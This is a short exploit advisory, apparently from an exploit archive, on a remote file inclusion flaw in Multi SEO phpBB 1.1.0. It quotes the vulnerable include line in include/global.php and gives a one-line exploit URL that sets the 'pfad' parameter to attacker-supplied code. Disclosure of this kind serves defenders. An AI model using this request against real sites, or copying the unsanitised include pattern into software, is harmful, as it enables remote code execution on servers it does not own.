id: 4344
date: 12/03/2008
title: Multi SEO phpBB 1.1.0 (pfad) Remote File Inclusion Vulnerability
author: NoGe
cves: 

================================================================
Multi SEO phpBB 1.1.0 (pfad) Remote File Inclusion Vulnerability
================================================================


==========================================================================


  [o] Multi SEO phpBB 1.1.0 Remote File Inclusion Vulnerability

       Software : Multi SEO phpBB version 1.1.0

       Vendor   : http://www.phpbb-seo.de/

       Download : http://www.phpbb-seo.de/downloads/multi.html

       Author   : NoGe

==========================================================================


  [o] Vulnerable file


       include/global.php


        include_once ($pfad . 'include/config.php');



  [o] Exploit

       http://localhost/[path]/include/global.php?pfad=[evilcode]


==========================================================================



#  0day.today [2023-03-23]  #